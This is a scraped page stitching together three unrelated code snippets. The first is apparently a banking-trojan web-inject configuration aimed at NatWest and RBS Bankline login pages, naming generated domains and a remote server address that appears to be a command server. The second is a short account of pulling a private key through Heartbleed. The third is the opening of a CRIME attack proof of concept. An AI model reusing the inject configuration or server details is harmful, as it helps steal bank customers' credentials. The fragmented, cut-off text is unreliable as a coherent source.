This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<sinj> | |
<mm>https://www.bankline.natwest.com*</mm> | |
<sm>https://www.bankline.natwest.com/CWSLogon/logon.do*</sm> | |
<nh>ccsarewkpsmofyibdhqcgvnltzxj.net</nh> | |
<srv>195.133.144.126:443</srv> | |
</sinj> | |
<sinj> | |
<mm>https://www.bankline.rbs.com*</mm> | |
<sm>https://www.bankline.rbs.com/CWSLogon/logon.do*</sm> | |
<nh>cdsarpwtfdxysnmgejvzbicolqku.net</nh> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
I wasn't first to get the key. Nor was I second, third, or even fourth. I'm probably not even the | |
10th to get it (ok, looks like I was the 7th.) But I'm happy that I was able to prove to myself | |
that I too could do it. | |
First, I have to admit I was a skeptic. Like the handful of other dissenters, I had initially | |
believed that it would be highly improbable under normal conditions to obtain the private key | |
through exploiting Heartbleed. So this was my motivation for participating in Cloudflare's | |
challenge. I had extracted a lot of other things with Heartbleed, but I hadn't actually set out to | |
extract private keys. So I wanted to see first-hand if it was possible or not. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This is supposedly what CRIME by Juliano Rizzo and Thai Duong will do | |
# Algorithm by Thomas Pornin, coding by xorninja, improved by @kkotowicz | |
# http://security.blogoverflow.com/2012/09/how-can-you-protect-yourself-from-crime-beasts-successor/ | |
import string | |
import zlib | |
import sys | |
import random | |
charset = string.letters + string.digits + "%/+=" |